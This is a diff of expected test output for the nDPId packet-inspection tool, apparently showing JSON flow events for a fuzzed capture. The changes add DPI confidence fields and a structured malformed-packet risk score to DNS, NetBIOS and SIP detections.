 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864991,"flow_last_seen":1120469864991,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1120469864991,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120469864991,"pkt":"ADBUADRWAODtAW69CABFAABEakEAAIARTSnIqAECwKgBAQqvADUAMDE089sAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRzBGFycGEAAAwAAQ=="}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864991,"flow_last_seen":1120469864991,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2735,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-adds.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864991,"flow_last_seen":1120469864991,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-adds.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469864992,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1120469864992,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120469864992,"pkt":"AODzAW69ADBUADRWCABFAABbAABAAEARtz79qAEBwKgBAgA1Cq8ARxOw89uAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469864992,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469875687,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469875687,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1120469572981,"flow_last_seen":1120469865145,"flow_idle_time":180000,"flow_min_l4_payload_len":346,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":4122,"flow_avg_l4_payload_len":515,"midstream":0,"ts_msec":1120469875687,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469864992,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469875687,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469875687,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1120469572981,"flow_last_seen":1120469865145,"flow_idle_time":180000,"flow_min_l4_payload_len":346,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":4122,"flow_avg_l4_payload_len":515,"midstream":0,"ts_msec":1120469875687,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00423{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":157,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"ts_msec":1120469876437,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABPai8AAIARTB7AqAECwKgB\/wCJAIkAOluZhQIBEAABWQAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQWNNAAAgAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":157,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469877188,"flow_last_seen":1120469877188,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469877188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":169,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1120469877188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120469877188,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOajAAAIARTB3AqAECwKgB\/wCJAKkAOluZhQIBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNB10FDQUJNAAAgAAE="}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120469540839,"flow_last_seen":1120469875687,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":900,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120469540839,"flow_last_seen":1120469875687,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":900,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469828958,"flow_last_seen":1120469828958,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.202","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469831652,"flow_last_seen":1120469835658,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469921898,"flow_last_seen":1120469921898,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1120469921898,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469921898,"pkt":"ADBUADRWAODtAW69CABFAABIajUAAIARTRzAqAECwKgBAQqwADUANK04fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469921898,"flow_last_seen":1120469921898,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469921898,"flow_last_seen":1120469921898,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469922894,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1120469922894,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469922894,"pkt":"ADBUADRWAODtAW69CABFAABIJXMAAIARTRvAqAECwKgBAQp8ADUANK14fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJRHliZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469922894,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.dybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469922894,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.dybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00423{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":163,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"ts_msec":1120469924456,"pkt":"\/\/\/\/\/\/\/\/AODtAW69qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":163,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469924897,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1120469924897,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469924897,"pkt":"ADBUADRWAODtAW69CABFAABIajoAAIARTRfAqAECwKgBEQqwADUANK04fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469924897,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469924897,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1120469926899,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469926899,"pkt":"QDBUADRWAODtAW69CABFAABIaj0AAIARTRTAqAECwKgBAQqwADUANK04fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1120469930905,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469930905,"pkt":"ADBUADRWAODtAW69CABFAABIaj4AAIARTRPAqAECwKgBAQqwADUANK04fNwBAACBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
